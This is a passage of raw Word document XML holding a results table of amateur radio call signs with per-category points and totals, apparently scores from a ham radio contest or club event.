        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>TOTAL</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>90</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2656D05B" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>N8MRS</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>TOTAL</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>90</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B840BCF" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>KB8HJJ</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>TOTAL</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>90</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C5F71A" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>W8GSR</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>TOTAL</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA57C16" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>KA1G</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>TOTAL</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>70</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13961117" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>KD8MSZ</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>19</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>TOTAL</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>69</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1A6290" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>K3AUX</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>17</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>38</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>TOTAL</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>65</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32442BE5" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>KE8ANW</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>TOTAL</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>48</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C54B426" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>KD8UOT</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>TOTAL</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58900C57" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>K8OVO</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>TOTAL</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>43</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29364D3C" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>NC8V</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
